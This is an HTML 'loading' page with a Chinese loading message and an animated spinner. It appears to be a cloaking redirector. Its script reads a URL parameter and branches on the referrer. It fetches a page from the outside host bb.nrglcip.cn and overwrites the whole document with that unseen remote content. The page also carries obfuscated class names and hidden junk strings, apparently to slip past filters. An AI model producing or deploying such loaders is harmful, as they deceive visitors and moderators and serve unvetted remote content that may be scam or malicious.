<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .URZTXe {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .URZTXe .ERUQ9m70yt {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .URZTXe .content {
            line-height: 50px;
            text-align: center
        }

        .URZTXe .img {
            width: 100%
        }

        .URZTXe .IqBWQcSS79w {
            text-align: center
        }

        .URZTXe .IqBWQcSS79w span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .URZTXe .IqBWQcSS79w span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .URZTXe .IqBWQcSS79w span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .URZTXe .IqBWQcSS79w span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .URZTXe .IqBWQcSS79w span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .URZTXe .IqBWQcSS79w span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .URZTXe .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function qB6ZbjnpwD(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var UeJrvm = qB6ZbjnpwD('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ UeJrvm +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ UeJrvm +".html?a=share";
		}
		
        vZY0lX=url+"#"+new Date().getTime();
        vZY0lX && function() {
            $.get(vZY0lX, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<img  src='' style='display:none'>
<b style='display:none' >lGXiLotA62Alu2</b>
<span style='display:none'>v1zhbvlCLTXTKUjhwNbeLeMglU99ZnZriikUht3BnAUdYLwLQ9B2S3mJCsYVVvDTNgZ</span>
<b style='display:none' >lGXiLotA62Alu2</b>
<div style='display:none'>T8Q8YICmlxE0S2ozxI28VQiTvlyvejUkQpOMVM9O5PACmuybPtpahNwTyhcGN0LsCM7Ekp26sRpDr53DCYwb</div><div class="URZTXe">
    <div class="ERUQ9m70yt">
        <div class="IqBWQcSS79w">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<div style='display:none'>QcD1akuYfRP81SAN22mvNbIG587</div>
<ul style='display:none' >cx1fTL9I8C2ofcvs8erH23eSBT4Mqd5zvL0Z1VrgCFpy2veghmMnE6</ul>
<div style='display:none'>QcD1akuYfRP81SAN22mvNbIG587</div>
<li style='display:none' >xsNlJcphLec648UIiVI4X</li>
<b style='display:none' >AwI4lrwxEzLLel1Jm6MFr1Chdmhm5CcJDEEmN3xDPhfGZYptg2NAulmm4lESGMm60IIhuHuCIksQ2z</b>
<b style='display:none' >AwI4lrwxEzLLel1Jm6MFr1Chdmhm5CcJDEEmN3xDPhfGZYptg2NAulmm4lESGMm60IIhuHuCIksQ2z</b></body>
</html>